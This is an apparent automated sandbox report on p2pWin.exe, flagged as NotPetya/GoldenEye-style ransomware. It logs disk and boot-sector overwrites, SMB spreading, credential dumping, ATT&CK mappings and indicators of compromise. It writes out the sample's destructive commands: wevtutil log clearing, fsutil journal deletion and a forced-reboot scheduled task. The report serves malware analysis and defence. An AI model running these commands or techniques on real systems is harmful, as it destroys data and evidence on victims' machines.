            Source: Binary string: c:\src\Pstools\psexec\EXE\Release\psexec.pdb source: dllhost.dat.1.dr
            Source: Binary string: C:\Zeus \PC\documents\visual studio 2010\Projects\Keygroup\Release\Keygroup.pdb source: p2pWin.exe
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: p2pWin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_02E58677
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_000325C5 push ecx; ret 0_2_000325D8
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_0003318B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0003318B
Source: p2pWin.exe | Static PE information: real checksum: 0x6ab82 should be: 0x6f87c

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File written: \Device\Harddisk0\DR0 offset: 5120 length: 5120
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification, \\.\PhysicalDrive0 1_2_02E58CBF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive 1_2_02E51038
Source: C:\Windows\SysWOW64\rundll32.exe | File written: C: offset: 512
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dllhost.dat
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dllhost.dat

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,FindCloseChangeNotification, \\.\PhysicalDrive0 1_2_02E58CBF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive 1_2_02E51038
Source: C:\Users\user\Desktop\p2pWin.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_1-7341
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6648 | Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5408 | Thread sleep time: -2700000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5408 | Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_4-3589
Source: C:\Users\user\Desktop\p2pWin.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-2673
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 2700000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-6006
Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Windows\dllhost.dat
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,1_2_02E58E7F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,1_2_02E58243
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,1_2_02E5908A
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 2700000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_1-5828
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_1-5889
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node graph_1-5761
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | API call chain: ExitProcess graph end node graph_4-3591
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D61000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWrB
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_02E51973
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_0003318B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0003318B
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_00032C3B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00032C3B
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_00031000 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,ExpandEnvironmentStringsA,GetProcessHeap,HeapAlloc,GetFullPathNameA,GetProcessHeap,HeapFree,0_2_00031000
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E5A2E8 htonl,memset,socket,htons,ioctlsocket,LdrInitializeThunk,connect,select,__WSAFDIsSet,closesocket,1_2_02E5A2E8
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_00032C3B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00032C3B
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_000310E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000310E6
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Code function: 4_2_00007FF72E9055B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF72E9055B8
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Code function: 4_2_00007FF72E905874 SetUnhandledExceptionFilter,4_2_00007FF72E905874
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Code function: 4_2_00007FF72E907270 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF72E907270

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.0 139
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.1 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 173.222.162.32 445
Source: C:\Users\user\Desktop\p2pWin.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E573FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_02E573FD
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\p2pWin.exe | Code function: 0_2_0003276F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0003276F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E573FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_02E573FD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E57DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_02E57DEB

Stealing of Sensitive Information

Source: Yara match | File source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\F2CD.tmp | Code function: 4_2_00007FF72E902610 GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,4_2_00007FF72E902610
Source: Yara match | File source: C:\Windows\dllhost.dat, type: DROPPED
MITRE ATT&CK Matrix (techniques flagged for this sample; the number in parentheses is the one the report shows beside the technique)
• Initial Access: Valid Accounts (1)
• Execution: Windows Management Instrumentation (2), Native API (3), Command and Scripting Interpreter (2), Scheduled Task/Job (1), Service Execution (1)
• Persistence: Valid Accounts (1), Scheduled Task/Job (1), Bootkit (4)
• Privilege Escalation: Valid Accounts (1), Access Token Manipulation (11), Process Injection (112), Scheduled Task/Job (1)
• Defense Evasion: Obfuscated Files or Information (1), File Deletion (1), Masquerading (2), Valid Accounts (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (11), Process Injection (112), Bootkit (4), Rundll32 (1), Indicator Removal (2)
• Credential Access: OS Credential Dumping (1)
• Discovery: System Time Discovery (1), File and Directory Discovery (3), System Information Discovery (4), Network Share Discovery (1), Security Software Discovery (21), Virtualization/Sandbox Evasion (21), Process Discovery (12), Remote System Discovery (1), System Network Configuration Discovery (1)
• Lateral Movement: Taint Shared Content (1), Exploitation of Remote Services (11)
• Collection: Archive Collected Data (11)
• Command and Control: Ingress Tool Transfer (1), Encrypted Channel (22), Non-Standard Port (1), Application Layer Protocol (1)
• Impact: Data Encrypted for Impact (1), System Shutdown/Reboot (11)
• Exfiltration, Network Effects, Remote Service Effects, Resource Development, Reconnaissance: no techniques flagged
Behavior Graph (ID: 1346554, Sample: p2pWin.exe, Startdate: 22/11/2023, Architecture: WINDOWS, Score: 100)
• Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures
• p2pWin.exe (started): dropped C:\Windows\dllcm.dat (data); signature: Contains functionality to create processes via WMI; started rundll32.exe
• rundll32.exe: network contacts 173.222.162.32 (ports 139, 443, 445; AKAMAI-ASUS, United States), 192.168.2.0 (unknown), 192.168.2.1 (ports 274, 80; unknown); dropped \Device\Harddisk0\DR0 (data), C:\Program Files\...\updater.exe (data), C:\Program Files\...\private_browsing.exe (data) and 34 other files (33 malicious); signatures: Detected Petya / NotPetya (based on Eternalblue SMBv1 Shellcode pattern); System process connects to network (likely due to code injection or exploit); Contains functionality to check for running processes (XOR); 10 other signatures; started cmd.exe, cmd.exe, F2CD.tmp
• cmd.exe (first instance): signatures: Clears the journal log; Uses schtasks.exe or at.exe to add and modify task schedules; started conhost.exe, schtasks.exe
• cmd.exe (second instance): started conhost.exe, wevtutil.exe, wevtutil.exe, 3 other processes
• F2CD.tmp: signature: Contains functionality to dump credential hashes (LSA Dump); started conhost.exe

Antivirus detection (Source, Detection, Scanner, Label):
Source: p2pWin.exe, Detection: 59%, Scanner: ReversingLabs, Label: Win32.Ransomware.GoldenEye
Source: p2pWin.exe, Detection: 100%, Scanner: Avira, Label: HEUR/AGEN.1316511
Source: p2pWin.exe, Detection: 100%, Scanner: Joe Sandbox ML
Source: C:\Windows\dllhost.dat, Detection: 2%, Scanner: ReversingLabs
No Antivirus matches
No Antivirus matches
Source: http://192.168.2.1/, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Source: http://192.168.2.1:80/, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Source: http://192.168.2.1/#=, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Domains (Name, IP, Active, Malicious, Antivirus Detection, Reputation):
fp2e7a.wpc.phicdn.net, IP: 192.229.211.108, Active: true, Malicious: false, Reputation: unknown
URLs (Name, Source, Malicious, Antivirus Detection, Reputation):
http://192.168.2.1/#=, Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
http://192.168.2.1:80/, Source: rundll32.exe, 00000001.00000002.1670751144.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
http://192.168.2.1/, Source: rundll32.exe, 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
IPs (IP, Domain, Country, ASN, ASN Name, Malicious):
173.222.162.32, Domain: unknown, Country: United States, ASN: 35994, ASN Name: AKAMAI-ASUS, Malicious: true
Private IPs: 192.168.2.0, 192.168.2.1
              Joe Sandbox Version:38.0.0 Ammolite
              Analysis ID:1346554
              Start date and time:2023-11-22 19:11:22 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 0s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:
              Sample file name:p2pWin.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@24/63@0/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 71
              • Number of non-executed functions: 74
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Connection to analysis system has been lost, crash info: Unknown
              • Excluded IPs from analysis (whitelisted): 72.21.81.240
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: p2pWin.exe
Time: 19:12:08, Type: API Interceptor, Description: 3x Sleep call for process: rundll32.exe modified
              No context
Domain context: fp2e7a.wpc.phicdn.net (resolving to 192.229.211.108 in every case) was also seen in these previously analysed malicious samples (Sample Name / URL: Threat Name):
• AntiRecuvaAndDB.exe: Phobos
• eJQX7qdYIS.exe: RedLine, zgRAT
• SCO24.pif.exe: zgRAT
• file.exe: RedLine, SectopRAT
• file.exe: RedLine
• Anna_Maria.exe: Unknown
• INVOICE.exe: Remcos, AgentTesla, AsyncRAT, Clipboard Hijacker
• file.exe: Phonk Miner
• SWIFT.vbs: AgentTesla, GuLoader
• SOA_settlement_order_remittance_invoice_19_11_20230000000000000000000000000_2023.vbs: GuLoader
• PO-230270.exe: FormBook
• SOA_settlement_details_transfer_invoice_014_november_2023.exe: AgentTesla
• NewOrder.exe: AgentTesla
• poc.exe: Clipboard Hijacker
• https://134.122.188.176/: Unknown
• txt.ps1: AgentTesla
• lnvoice-1597256897.pdf.js: AgentTesla
• NewOrder.exe: Lokibot
• RO67OsrIWi.exe: Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT
• NewOrder.exe: Lokibot
ASN context: AKAMAI-ASUS was also seen in these previously analysed malicious samples (Sample Name / URL: Threat Name, IP):
• http://fixme.it: Unknown, 23.212.249.134
• https://storage.googleapis.com/logon-webservices73h6439jd983rnk3fy9ohiu4h83rtb478yhf474yrfh4/preload-reCaptcha.html: Fake Captcha, HTMLPhisher, 23.212.249.90
• Microsoft 365 security You have messages in quarantine.msg: Fake Captcha, HTMLPhisher, 23.220.140.112
• http://img1.wsimg.com/blobby/go/7a01c1ee-685d-49b6-ad23-74636c936c34/downloads/10651641465.pdf: Unknown, 23.50.230.182
• https://storage.googleapis.com/fedexfr/hreflj.html#?Z289MSZzMT0xNzQzNzkwJnMyPTM2NjgzMjYyNyZzMz1HTEI=: Phisher, 104.70.70.162
• ZenY9BAc8B.elf: Mirai, 2.16.193.215
• VLMEMjKea7.elf: Mirai, 104.78.21.178
• ccbS3mSC4n.elf: Mirai, 72.246.93.178
• WzpinhzvZl.elf: Mirai, 95.101.173.139
• 7vbrDg2AF5.elf: Mirai, 95.101.248.59
• https://www.vmware.com/go/getplayer-win: Unknown, 23.57.80.48
• http://steemcomunility.ru/: Unknown, 23.215.0.145
• https://www.enrruchi.xyz/login: Unknown, 23.222.196.28
• https://www.gcvsqap.cn/login: Unknown, 23.209.60.28
• https://hasvp.apinvoicesquickbookapp.top/?pgn=ptmetcm5hZ2xlQG9sZHBsYW5rdHJhaWxiYW5rLmNvbQ==: Unknown, 23.215.0.165
• Aging#04533.htm: HTMLPhisher, 23.54.202.151
• Aging#04533.htm: HTMLPhisher, 23.205.104.41
• https://fs6.formsite.com/res/showFormPreview?EParam=0f3EXAbWkRy3B3dNHgQl_huJ3lg3ramcMyDvWowlzTJXAg2hUkggomInZJc2I3By: HTMLPhisher, 23.215.0.166
• file.exe: SmokeLoader, 23.200.88.41
• https://www.thenicheng.com: Unknown, 23.218.144.90
              No context
Dropped file context: C:\Windows\dllhost.dat was also seen in these previously analysed malicious samples (Sample Name: Threat Name):
• 027.dll: Petya / NotPetya, Mimikatz
• QYXZGHJc38.dll: Petya / NotPetya, Mimikatz
• NotPetya.exe: Mimikatz, NotPetya
• NotPetya DLL.dll.dll: Petya / NotPetya, Mimikatz
• Trojan.Ransom.exe: Mimikatz, NotPetya
• qFTst626iV.dll: Petya / NotPetya, Mimikatz
• NotPetya.dll: Petya / NotPetya, Mimikatz
• notpetya.dll: Petya / NotPetya, Mimikatz
• 6r3kQ7Ddkk.dll: Petya / NotPetya, Mimikatz
